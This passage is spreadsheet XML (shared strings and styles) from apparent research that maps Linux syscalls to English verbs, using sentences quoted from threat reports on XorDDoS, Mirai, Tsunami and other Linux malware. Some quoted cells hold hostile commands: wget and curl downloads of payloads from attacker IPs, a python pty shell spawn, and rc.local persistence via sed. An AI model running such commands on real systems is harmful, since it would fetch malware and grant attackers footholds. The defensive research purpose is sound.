    <t>change working directory</t>
  </si>
  <si>
    <t>chdir()</t>
  </si>
  <si>
    <t>changes the current working directory</t>
  </si>
  <si>
    <t>write</t>
  </si>
  <si>
    <t>write to a file descriptor</t>
  </si>
  <si>
    <t>rename</t>
  </si>
  <si>
    <t>change the name or location of a file</t>
  </si>
  <si>
    <t>rename() renames a file, moving it between directories if required.</t>
  </si>
  <si>
    <t>fchmod</t>
  </si>
  <si>
    <t>change permissions of a file</t>
  </si>
  <si>
    <t>chmod</t>
  </si>
  <si>
    <t>lchmod</t>
  </si>
  <si>
    <t>update</t>
  </si>
  <si>
    <t>if the file doesn’t exist, then it creates the file and updates it with a random 32-byte string.</t>
  </si>
  <si>
    <t>Xorddos.Trend2</t>
  </si>
  <si>
    <t>Figure 3. Code snippet showing XORDDoS’ capability to download and update files.</t>
  </si>
  <si>
    <t>format</t>
  </si>
  <si>
    <t>A string is formatted and the sed program is called which writes to the file in question (there are several string operations, such as sed -i -e '2 i%s/%s' /etc/rc.local is formatted for example).</t>
  </si>
  <si>
    <t>modify</t>
  </si>
  <si>
    <t>Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify files i.e., /etc/rc.local and /etc/rc.d/rc.local</t>
  </si>
  <si>
    <t>A rootkit is a kernel module that hides the presence of malicious code by modifying kernel data structures.</t>
  </si>
  <si>
    <t>overwrite</t>
  </si>
  <si>
    <t>allowing attackers to overwrite the host runc binary and gain root-level code execution privileges.</t>
  </si>
  <si>
    <t>The malware calls the subroutine daemon(__nochdir, __noclose) to set itself as a background daemon process, which internally calls fork() and setsid().</t>
  </si>
  <si>
    <t>Provides a root privilege by setting a new set of credentials and assigning its UID, GID to “0”</t>
  </si>
  <si>
    <t>DELETE</t>
  </si>
  <si>
    <t>Darlloz.Trend</t>
  </si>
  <si>
    <t>rm()</t>
  </si>
  <si>
    <t>delete</t>
  </si>
  <si>
    <t>This worm deletes the following files</t>
  </si>
  <si>
    <t>remove</t>
  </si>
  <si>
    <t>removes each specified file</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>drops each specified file</t>
  </si>
  <si>
    <t>rmdir</t>
  </si>
  <si>
    <t>delete a directory</t>
  </si>
  <si>
    <t>munmap</t>
  </si>
  <si>
    <t>ummap</t>
  </si>
  <si>
    <t>unmap files or devices into memory</t>
  </si>
  <si>
    <t>unlink</t>
  </si>
  <si>
    <t>delete a name and possibly the file it refers to</t>
  </si>
  <si>
    <t>unlinkat</t>
  </si>
  <si>
    <t>remove a directory entry relative to a directory file descriptor</t>
  </si>
  <si>
    <t>remove a file or directory</t>
  </si>
  <si>
    <t>drop the file from the victim machine</t>
  </si>
  <si>
    <t>CLOSE</t>
  </si>
  <si>
    <t>close</t>
  </si>
  <si>
    <t>close a file descriptor</t>
  </si>
  <si>
    <t>free</t>
  </si>
  <si>
    <t>the resources associated with the open file description are freed</t>
  </si>
  <si>
    <t>OTHER</t>
  </si>
  <si>
    <t>lseek()</t>
  </si>
  <si>
    <t>reposition</t>
  </si>
  <si>
    <t>reposition read/write file offset</t>
  </si>
  <si>
    <t>PROC</t>
  </si>
  <si>
    <t>PROC_EXE</t>
  </si>
  <si>
    <t>execve()</t>
  </si>
  <si>
    <t>execute</t>
  </si>
  <si>
    <t>execute program</t>
  </si>
  <si>
    <t>exec()</t>
  </si>
  <si>
    <t>executes the program referred to by pathname</t>
  </si>
  <si>
    <t>replace</t>
  </si>
  <si>
    <t>replaces the current process image with a new process image.</t>
  </si>
  <si>
    <t>clone</t>
  </si>
  <si>
    <t>create a child process</t>
  </si>
  <si>
    <t>fork</t>
  </si>
  <si>
    <t>vfork</t>
  </si>
  <si>
    <t>create a child process and block parent</t>
  </si>
  <si>
    <t>execve</t>
  </si>
  <si>
    <t>the malware constructs a shell command and then uses the system function to execute them</t>
  </si>
  <si>
    <t>Mirai.Impera</t>
  </si>
  <si>
    <t>Mirai uses a brute force technique for guessing passwords a.k.a. dictionary attacks based on the following list:</t>
  </si>
  <si>
    <t>call</t>
  </si>
  <si>
    <t>This is the function to be called when performing DoS by HTTP</t>
  </si>
  <si>
    <t>RedXOR uses an open-source LKM rootkit called “Adore-ng” to hide its process.</t>
  </si>
  <si>
    <t>spawn</t>
  </si>
  <si>
    <t>In the new spawned shell, the malware executes python -c “import pty;pty.spawn(‘/bin/sh’)” to get a pseudo-terminal (pty) interface.</t>
  </si>
  <si>
    <t>We'll see 3 thread will be spawned, which using "/dev/null" as value, this is typical MO for most types of AES.DDoS'ers we saw.</t>
  </si>
  <si>
    <t>The process then forks itself and breaks away from its parent by calling setsid(..).</t>
  </si>
  <si>
    <t>Mirai.Mal</t>
  </si>
  <si>
    <t>Then this main process will exit here. and forked to new process PID (note: If you go this far means the malware can infect your system).</t>
  </si>
  <si>
    <t>perform</t>
  </si>
  <si>
    <t>The JSESSIONID value holds the command ID for the job the C2 wants the malware to perform.</t>
  </si>
  <si>
    <t>method involves running a bash script that performs the following activities via the command line:</t>
  </si>
  <si>
    <t>install</t>
  </si>
  <si>
    <t>we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.</t>
  </si>
  <si>
    <t>Tsunami.Cado</t>
  </si>
  <si>
    <t>And the kinsing malware itself was installed at /etc/kinsing</t>
  </si>
  <si>
    <t>Persistence is achieved by the malware by adding to /etc/rc.local</t>
  </si>
  <si>
    <t>SSH brute-force tool – the attacker added a new tool called hxx (md5=f0551696774f66ad3485445d9e3f7214)</t>
  </si>
  <si>
    <t>start</t>
  </si>
  <si>
    <t>bind it to the specific port (not random) TCP/48101 from localhost IP address 127.0.0.1 and then starting to listen to the incoming connection:</t>
  </si>
  <si>
    <t>The commands chkconfig –add &lt;service_name&gt; and update-rc.d then add a service that starts the daemon process at boot.</t>
  </si>
  <si>
    <t>PROC_KILL</t>
  </si>
  <si>
    <t>kill</t>
  </si>
  <si>
    <t>send</t>
  </si>
  <si>
    <t>send signal to a process</t>
  </si>
  <si>
    <t>exit_group</t>
  </si>
  <si>
    <t>exit</t>
  </si>
  <si>
    <t>exit all threads in a process</t>
  </si>
  <si>
    <t>Tsunami.Unit42</t>
  </si>
  <si>
    <t>It then kills all Telnet and SSH related processes, and connects with a C2 server to receive further commands.</t>
  </si>
  <si>
    <t>Tsunami.Trend</t>
  </si>
  <si>
    <t>Kill all current packeting.</t>
  </si>
  <si>
    <t>end</t>
  </si>
  <si>
    <t>this fallback function also checks if cron, crond, and atd are active. if the first two work, then the function ends.</t>
  </si>
  <si>
    <t>PROC_TRACE</t>
  </si>
  <si>
    <t>ptrace</t>
  </si>
  <si>
    <t>trace</t>
  </si>
  <si>
    <t>process trace</t>
  </si>
  <si>
    <t>observe</t>
  </si>
  <si>
    <t>The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process</t>
  </si>
  <si>
    <t>control</t>
  </si>
  <si>
    <t>examine</t>
  </si>
  <si>
    <t>examine and change the tracee's memory and registers.</t>
  </si>
  <si>
    <t>PROC_MEM</t>
  </si>
  <si>
    <t>shmdt</t>
  </si>
  <si>
    <t>attach</t>
  </si>
  <si>
    <t>shmat() attaches the shared memory segment identified by shmid to the address space of the calling process.</t>
  </si>
  <si>
    <t>shmat</t>
  </si>
  <si>
    <t>shmget</t>
  </si>
  <si>
    <t>allocate</t>
  </si>
  <si>
    <t>allocates a shared memory segment</t>
  </si>
  <si>
    <t>PROC_WAIT</t>
  </si>
  <si>
    <t>waitpid</t>
  </si>
  <si>
    <t>wait for process to change state</t>
  </si>
  <si>
    <t>wait4</t>
  </si>
  <si>
    <t>wait for process to change state, BSD style</t>
  </si>
  <si>
    <t>PROC_OTHER</t>
  </si>
  <si>
    <t>mremap</t>
  </si>
  <si>
    <t>remap</t>
  </si>
  <si>
    <t>remap a virtual memory address</t>
  </si>
  <si>
    <t>mprotect</t>
  </si>
  <si>
    <t>set protection on a region of memory</t>
  </si>
  <si>
    <t>set_tid_address</t>
  </si>
  <si>
    <t>set pointer to thread ID</t>
  </si>
  <si>
    <t>arch_prctl</t>
  </si>
  <si>
    <t>set architecture-specific thread state</t>
  </si>
  <si>
    <t>set_thread_area</t>
  </si>
  <si>
    <t>set a thread local storage (TLS) area</t>
  </si>
  <si>
    <t>nanosleep</t>
  </si>
  <si>
    <t>suspend</t>
  </si>
  <si>
    <t>nanosleep() suspends the execution</t>
  </si>
  <si>
    <t>sleep</t>
  </si>
  <si>
    <t>The malware sleeps and tries to obtain the lock on the file again when it wakes up.</t>
  </si>
  <si>
    <t>set_robust_list</t>
  </si>
  <si>
    <t>set list of robust futexes</t>
  </si>
  <si>
    <t>futex</t>
  </si>
  <si>
    <t>The futex() system call provides a method for a program to wait for a value at a given address to change, and a method to wake up anyone waiting on a particular address</t>
  </si>
  <si>
    <t>wake</t>
  </si>
  <si>
    <t>brk</t>
  </si>
  <si>
    <t>change data segment size</t>
  </si>
  <si>
    <t>DEVICE</t>
  </si>
  <si>
    <t>ioctl</t>
  </si>
  <si>
    <t>control device</t>
  </si>
  <si>
    <t>The ioctl() function manipulates the underlying device parameters of special files.</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>ID_SET</t>
  </si>
  <si>
    <t>setsid</t>
  </si>
  <si>
    <t>creates a session and sets the process group ID</t>
  </si>
  <si>
    <t>assign</t>
  </si>
  <si>
    <t>ID_GET</t>
  </si>
  <si>
    <t>getppid</t>
  </si>
  <si>
    <t>get process identification</t>
  </si>
  <si>
    <t>getpid</t>
  </si>
  <si>
    <t>getgid</t>
  </si>
  <si>
    <t>get group identity</t>
  </si>
  <si>
    <t>getegid</t>
  </si>
  <si>
    <t>geteuid</t>
  </si>
  <si>
    <t>get user identity</t>
  </si>
  <si>
    <t>getuid</t>
  </si>
  <si>
    <t>TIME</t>
  </si>
  <si>
    <t>TIME_SET</t>
  </si>
  <si>
    <t>settimeofday</t>
  </si>
  <si>
    <t>get / set time</t>
  </si>
  <si>
    <t>TIME_GET</t>
  </si>
  <si>
    <t>time</t>
  </si>
  <si>
    <t>get time in seconds</t>
  </si>
  <si>
    <t>gettimeofday</t>
  </si>
  <si>
    <t>INFO</t>
  </si>
  <si>
    <t>INFO_GET</t>
  </si>
  <si>
    <t>prlimit64</t>
  </si>
  <si>
    <t>get/set resource limits</t>
  </si>
  <si>
    <t>getrlimit</t>
  </si>
  <si>
    <t>ugetrlimit</t>
  </si>
  <si>
    <t>sysinfo</t>
  </si>
  <si>
    <t>return</t>
  </si>
  <si>
    <t>returns information on overall system statistics</t>
  </si>
  <si>
    <t>sysinfo() provides a simple way of getting overall system statistics.</t>
  </si>
  <si>
    <t>uname</t>
  </si>
  <si>
    <t>get name and information about current kernel</t>
  </si>
  <si>
    <t>gather system information</t>
  </si>
  <si>
    <t>look for system information</t>
  </si>
  <si>
    <t>find linux kernel information</t>
  </si>
  <si>
    <t>NET</t>
  </si>
  <si>
    <t>NET_CONNECT</t>
  </si>
  <si>
    <t>connect()</t>
  </si>
  <si>
    <t>initiate</t>
  </si>
  <si>
    <t>initiate a connection on a socket</t>
  </si>
  <si>
    <t>connect</t>
  </si>
  <si>
    <t>The connect() system call connects the socket referred to by the file descripton</t>
  </si>
  <si>
    <t>pipe</t>
  </si>
  <si>
    <t>create pipe</t>
  </si>
  <si>
    <t>bind</t>
  </si>
  <si>
    <t>bind a name to a socket</t>
  </si>
  <si>
    <t>bind() assigns the address specified by addr to the socket</t>
  </si>
  <si>
    <t>socket</t>
  </si>
  <si>
    <t>create an endpoint for communication</t>
  </si>
  <si>
    <t>hook</t>
  </si>
  <si>
    <t>Hides the UDP4 connection by hooking /proc/net/udpHides the UDP6 connection by hooking /proc/net/udp6</t>
  </si>
  <si>
    <t>Hides the TCP4 connection by hooking /proc/net/tcpHides the TCP6 connection by hooking /proc/net/tcp6</t>
  </si>
  <si>
    <t>NET_OPTION</t>
  </si>
  <si>
    <t>setsockopt</t>
  </si>
  <si>
    <t>get and set options on sockets</t>
  </si>
  <si>
    <t>getsockopt() and setsockopt() manipulate options for the socket</t>
  </si>
  <si>
    <t>getsockopt</t>
  </si>
  <si>
    <t>getsockname</t>
  </si>
  <si>
    <t>get socket name</t>
  </si>
  <si>
    <t>NET_TRANSMIT</t>
  </si>
  <si>
    <t>recv</t>
  </si>
  <si>
    <t>receive</t>
  </si>
  <si>
    <t>receive a message from a socket</t>
  </si>
  <si>
    <t>recvmsg</t>
  </si>
  <si>
    <t>recvfrom</t>
  </si>
  <si>
    <t>send a message on a socket</t>
  </si>
  <si>
    <t>sendto</t>
  </si>
  <si>
    <t>sendmsg</t>
  </si>
  <si>
    <t>transfer</t>
  </si>
  <si>
    <t>transfer data to command and control server.</t>
  </si>
  <si>
    <t>Miria.NJCCIC</t>
  </si>
  <si>
    <t>communicate</t>
  </si>
  <si>
    <t>Miori has resurfaced using a text-based protocol to communicate with its command-and-control (C&amp;C) rather than the customary use of binary-based protocol.</t>
  </si>
  <si>
    <t>encrypt its strings and to communicate with the command and control (C&amp;C) server.</t>
  </si>
  <si>
    <t>download</t>
  </si>
  <si>
    <t>The attacker communicates with a bot to SSH brute force a target device and download XorDdos.</t>
  </si>
  <si>
    <t>Code snippet showing XORDDoS’ capability to download and update files.</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>inserts a function that is aimed to replace curl or wget, namely to download files from the web.</t>
  </si>
  <si>
    <t>wget http://122.51.133.49:10086/VIP –O VIP</t>
  </si>
  <si>
    <t>Xorddos.Trend3</t>
  </si>
  <si>
    <t>Xorddos.Trend4</t>
  </si>
  <si>
    <t>Xorddos.Trend5</t>
  </si>
  <si>
    <t>Xorddos.Trend6</t>
  </si>
  <si>
    <t>curl</t>
  </si>
  <si>
    <t>Tsunami.Jun</t>
  </si>
  <si>
    <t xml:space="preserve">curl -o /tmp/russ http://106[.].246.224.219/russia.sh); </t>
  </si>
  <si>
    <t>Read</t>
  </si>
  <si>
    <t>statfs()、stat()、lseek()、readlink()、stat64()、access()、poll()、ppoll()、getcwd()、read()、fstat64()、lstat()、dup()、dup2()、fstat()、fcntl64()、newfstatat()、getdents()、fcntl()、_newselect()、select()、chdir()</t>
  </si>
  <si>
    <t>Create, Open</t>
  </si>
  <si>
    <t>mkdir()、open()、openat()、mmap()、mmap2()、umask()、link()、linkat()、symlink()、symlinkat()</t>
  </si>
  <si>
    <t>Upate</t>
  </si>
  <si>
    <t>write()、rename()、fchmod()、chown()、fchown()、lchown()</t>
  </si>
  <si>
    <t>Delete</t>
  </si>
  <si>
    <t>rmdir()、munmap()、unlink()、unlinkat()、remove()</t>
  </si>
  <si>
    <t>Close</t>
  </si>
  <si>
    <t>close()</t>
  </si>
  <si>
    <t>PROCESS</t>
  </si>
  <si>
    <t>Execute</t>
  </si>
  <si>
    <t>execve()、clone()、fork()、vfork()</t>
  </si>
  <si>
    <t>ptrace()</t>
  </si>
  <si>
    <t>kill()、exit_group()</t>
  </si>
  <si>
    <t>memory</t>
  </si>
  <si>
    <t>shmget()、shmat()、shmdt()</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>mremap()、mprotect()、set_tid_address()、arch_prctl()、set_thread_area()、waitpid()、nanosleep()、set_robust_list()、wait4()、futex()、brk()</t>
  </si>
  <si>
    <t>Device</t>
  </si>
  <si>
    <t>ioctl()</t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t>Set</t>
  </si>
  <si>
    <t>setsid()、settimeofday()</t>
  </si>
  <si>
    <t>Get</t>
  </si>
  <si>
    <t>getpid()、getppid()、getgid()、getegid()、getuid()、geteuid()、gettimeofday()、time()、sysinfo()、uname()、getrlimit()、prlimit64()、ugetrlimit()</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Connect</t>
  </si>
  <si>
    <t>connect()、pipe()、bind()、getsockname()、getsockopt()、setsockopt()、socket()</t>
  </si>
  <si>
    <t>Transmit</t>
  </si>
  <si>
    <t>recv()、recvfrom()、recvmsg()、send()、sendto()、sendmsg()</t>
  </si>
  <si>
    <t>English Verbs</t>
  </si>
  <si>
    <t>File</t>
  </si>
  <si>
    <t>Read, Close</t>
  </si>
  <si>
    <t>read、get、gather、check、find、check、fetch、look、see、use、extract、wait、select、manipulate、reposition、duplicate、share</t>
  </si>
  <si>
    <t>create、open、add、drop、mount、map、set、make</t>
  </si>
  <si>
    <t>update、format、modify、write、overwrite、set、change、rename</t>
  </si>
  <si>
    <t>delete、remove、drop、ummap</t>
  </si>
  <si>
    <t>close、free</t>
  </si>
  <si>
    <t>Process</t>
  </si>
  <si>
    <t>execute、use、call、spawn、fork、perform、install、add、start、create</t>
  </si>
  <si>
    <t>trace、observe、control、examine、change</t>
  </si>
  <si>
    <t>kill、exit、send、end</t>
  </si>
  <si>
    <t>allocate、attach</t>
  </si>
  <si>
    <t>map、remap、suspend、wake、change、wait、sleep、break</t>
  </si>
  <si>
    <t>control、send</t>
  </si>
  <si>
    <t>set、assign</t>
  </si>
  <si>
    <t>get、look、check、find、return</t>
  </si>
  <si>
    <t>connect、bind、get、hook、initiate、manipulate、assign、create、assign</t>
  </si>
  <si>
    <t>send、receive、communicate、transfer、wget、curl、download</t>
  </si>
  <si>
    <t># 共 87 個 syscall</t>
  </si>
  <si>
    <t># 從 Linux manual 找到的動詞</t>
  </si>
  <si>
    <t>https://linux.die.net/man/2/link</t>
  </si>
  <si>
    <t>Mode</t>
  </si>
  <si>
    <t>English verb in Manpage</t>
  </si>
  <si>
    <t>手冊擷取的動詞數</t>
  </si>
  <si>
    <t>Report 中額外動詞數</t>
  </si>
  <si>
    <t>總共收錄動詞數</t>
  </si>
  <si>
    <t>(16個)</t>
  </si>
  <si>
    <t>gather、fetch、look、see、use、extract、select</t>
  </si>
  <si>
    <t>PERMISSION</t>
  </si>
  <si>
    <t>fstat</t>
  </si>
  <si>
    <t>newfstatat</t>
  </si>
  <si>
    <t>lstat</t>
  </si>
  <si>
    <t>getcwd</t>
  </si>
  <si>
    <t>getdents</t>
  </si>
  <si>
    <t>poll</t>
  </si>
  <si>
    <t>ppoll</t>
  </si>
  <si>
    <t>(無樣本使用dup, dup2)</t>
  </si>
  <si>
    <t>fcntl64</t>
  </si>
  <si>
    <t>(open後或connect前會呼叫)</t>
  </si>
  <si>
    <t>Find the lowest numbered available file descriptor</t>
  </si>
  <si>
    <t>10個</t>
  </si>
  <si>
    <t>add、drop、mount</t>
  </si>
  <si>
    <t>5個</t>
  </si>
  <si>
    <t>update、format、modify、overwrite、set</t>
  </si>
  <si>
    <t>2個</t>
  </si>
  <si>
    <t>(動詞較不相同 read前呼叫此syscall)</t>
  </si>
  <si>
    <t>4個</t>
  </si>
  <si>
    <t>use、call、spawn、fork、perform、install、add、start</t>
  </si>
  <si>
    <t>kill、end</t>
  </si>
  <si>
    <t>1個</t>
  </si>
  <si>
    <t>3個</t>
  </si>
  <si>
    <t>11個</t>
  </si>
  <si>
    <t>INFO_SET</t>
  </si>
  <si>
    <t>configure、assign</t>
  </si>
  <si>
    <t>13個</t>
  </si>
  <si>
    <t>look、check、find</t>
  </si>
  <si>
    <t>7個</t>
  </si>
  <si>
    <t>6個</t>
  </si>
  <si>
    <t>communicate、transfer、wget、download</t>
  </si>
  <si>
    <t>(藍色底表示這個句子含有ASG Object，多數都被我們的extract模組抓到，沒有底色的則是句子有該動詞，但主詞受詞型態正確)</t>
  </si>
  <si>
    <t>Syscall_list</t>
  </si>
  <si>
    <t>English verb</t>
  </si>
  <si>
    <t>Ex_Sentence</t>
  </si>
  <si>
    <t xml:space="preserve">These verbs fit the </t>
  </si>
  <si>
    <t>following syscalls:</t>
  </si>
  <si>
    <t>opendir</t>
  </si>
  <si>
    <t>readdir</t>
  </si>
  <si>
    <t>closedir</t>
  </si>
  <si>
    <t>statfs</t>
  </si>
  <si>
    <t>stat</t>
  </si>
  <si>
    <t>stat64</t>
  </si>
  <si>
    <t>select</t>
  </si>
  <si>
    <t>does a mixture of select and getsockopt calls on the socket to ensure that the non-blocking socket has successfully connected.</t>
  </si>
  <si>
    <t>We then move onto select, if this call is successful thence move onto reading data from the C2.</t>
  </si>
  <si>
    <t>Xorddos.Cdn</t>
  </si>
  <si>
    <t>The SYN cookie does not require a certain time to wait for the response;</t>
  </si>
  <si>
    <t>Waits to receive any of the following commands from the C2 server and then acts on the command using the exec_packet subroutine.</t>
  </si>
  <si>
    <t>all the syscalls are fit</t>
  </si>
  <si>
    <t>all the syscalls fit</t>
  </si>
  <si>
    <t>備註: 由sed寫入檔案</t>
  </si>
  <si>
    <t>只會記錄到rename()</t>
  </si>
  <si>
    <t>the string to be format is: VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s</t>
  </si>
  <si>
    <t xml:space="preserve">however before it overwrites this file it first checks to see if it has already done so. </t>
  </si>
  <si>
    <t>give_root</t>
  </si>
  <si>
    <t>PROC_EXEC</t>
  </si>
  <si>
    <t>多加上 setsid()</t>
  </si>
  <si>
    <t>only fit nanosleep()</t>
  </si>
  <si>
    <t>The fake commands can include: cat resolv.conf sleep 1</t>
  </si>
  <si>
    <t>setsid, settimeofday</t>
  </si>
  <si>
    <t>configure</t>
  </si>
  <si>
    <t>In addition to the Command and control (C2) IP address and port it can also be configured to use a proxy.</t>
  </si>
  <si>
    <t>both are not suitable for configure</t>
  </si>
  <si>
    <t>no example found</t>
  </si>
  <si>
    <t xml:space="preserve">we then get the output from the command and check to see if the current executable name exists in the output. </t>
  </si>
  <si>
    <t>This fallback function also checks if cron, crond, and atd are active.</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Subcategory</t>
  </si>
  <si>
    <t>verb</t>
  </si>
  <si>
    <t>direct_syscall_list</t>
  </si>
  <si>
    <t>expend_syscall_list</t>
  </si>
  <si>
    <t>READ</t>
  </si>
  <si>
    <t>read(), readlink()</t>
  </si>
  <si>
    <t>readdir,statfs,stat,stat64,fstat,newfstatat,lstat,access,getdents</t>
  </si>
  <si>
    <t>statfs(),stat(),stat64(),fstat,newfstatat,lstat,getcwd,getdents</t>
  </si>
  <si>
    <t>readdir,statfs,stat,stat64,fstat,newfstatat,lstat,access,getdents,read,readlink</t>
  </si>
  <si>
    <t>statfs,stat,stat64,fstat,newfstatat,lstat,access,getdents</t>
  </si>
  <si>
    <t>poll,poll</t>
  </si>
  <si>
    <t>opendir,readdir,open,read</t>
  </si>
  <si>
    <t>dup,dup2</t>
  </si>
  <si>
    <t>opendir,readdir,closedir,open,read,statfs,stat,stat64,fstat,newfstatat,lstat,access,getdents</t>
  </si>
  <si>
    <t>mkdir,open,mmap,link,linkat,symlinkat,symlink</t>
  </si>
  <si>
    <t>mkdir()、open()、openat()、umask()、link()、linkat()、symlink()、symlinkat()</t>
  </si>
  <si>
    <t>open,openat</t>
  </si>
  <si>
    <t>open()、openat()、mmap()、mmap2()、link()、linkat()、symlink()、symlinkat()</t>
  </si>
  <si>
    <t>mmap,mmap2</t>
  </si>
  <si>
    <t>link,symlink</t>
  </si>
  <si>
    <t>rename,fchmod,chmod,lchmod</t>
  </si>
  <si>
    <t>write()、fchmod()、chown()、fchown()、lchown()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</si>
</sst>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9">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Roboto"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <b/>
      <sz val="25.0"/>
      <color rgb="FF000000"/>
      <name val="Graphik"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Docs-Roboto"/>
    </font>
    <font>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF38761D"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF9900FF"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <strike/>
      <color rgb="FF000000"/>
      <name val="Roboto"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Roboto"/>
    </font>
  </fonts>
  <fills count="22">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor rgb="FFFFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF4CCCC"/>
        <bgColor rgb="FFF4CCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF9FAFB"/>
        <bgColor rgb="FFF9FAFB"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB4A7D6"/>
        <bgColor rgb="FFB4A7D6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF9FC5E8"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor rgb="FFFFE599"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>
        <bgColor theme="4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB6D7A8"/>
        <bgColor rgb="FFB6D7A8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9EAD3"/>
        <bgColor rgb="FFD9EAD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CCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC9DAF8"/>
        <bgColor rgb="FFC9DAF8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEAD1DC"/>
        <bgColor rgb="FFEAD1DC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD0E0E3"/>
        <bgColor rgb="FFD0E0E3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6B8AF"/>
        <bgColor rgb="FFE6B8AF"/>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1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="4" fontId="1" numFmtId="0" xfId="0" applyFill="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>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5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="7" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="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3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
